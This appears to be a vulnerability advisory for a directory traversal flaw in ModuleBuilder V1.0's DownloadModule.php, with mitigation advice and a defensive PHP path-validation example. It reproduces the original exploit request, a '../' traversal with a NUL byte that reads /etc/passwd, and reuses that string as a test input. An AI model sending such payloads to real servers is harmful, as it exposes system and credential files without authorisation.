Vendor: ModuleBuilder
By: Unknown
CVSS: 5.5 (MEDIUM)
Remote File Disclosure
CWE: 200
Product Name: ModuleBuilder
Affected Version From: ModuleBuilder V1.0
Affected Version To: ModuleBuilder V1.0
Patch Exists: NO
2007

ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose arbitrary files on the server. By manipulating the 'file' parameter in the URL, an attacker can traverse directories and access sensitive files. In this case, the attacker is able to access the '/etc/passwd' file. This vulnerability was published on milw0rm.com on October 31, 2007.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and properly validate file paths before accessing files on the server. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
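
One way to implement the path validation recommended above, shown as an added PHP example (this is not ModuleBuilder's code; the function name resolve_download and the base directory are hypothetical, and the sample inputs are constructed):

```php
<?php
declare(strict_types=1);

// Added example, not ModuleBuilder code. resolve_download() and the base
// directory are hypothetical names chosen for illustration.
function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty names and NUL bytes: older PHP versions handed the path
    // to the filesystem truncated at the first NUL (the %00 in the request).
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks; false if nothing exists there.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator so that a sibling
    // such as "/srv/packages-old" cannot pass a check for "/srv/packages".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed demo: a temporary download directory holding one package.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mb_demo_' . bin2hex(random_bytes(4));
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'module.zip', 'demo');

$samples = [
    'module.zip',                              // legitimate name
    "../../../../../../../../etc/passwd\0",    // decoded form of the request on this page
    '../../../../../../../../etc/passwd',      // same traversal without the NUL
    'missing.zip',                             // no such file
];
foreach ($samples as $name) {
    $path = resolve_download($base, $name);
    printf("%-42s %s\n", addcslashes($name, "\0"), $path === null ? 'rejected' : 'served');
}

unlink($base . DIRECTORY_SEPARATOR . 'module.zip');
rmdir($base);
```

Only the first sample resolves to a path; the other three return null, so a download handler built on this check would answer them with an error instead of opening a file.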

Exploit-DB raw data:

ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
http://www.sugarforge.org/frs/download.php/1274/install_ModuleBuilderV1.0.zip
/modules/Builder/DownloadModule.php?file=../../../../../../../../etc/passwd%00

# milw0rm.com [2007-10-31]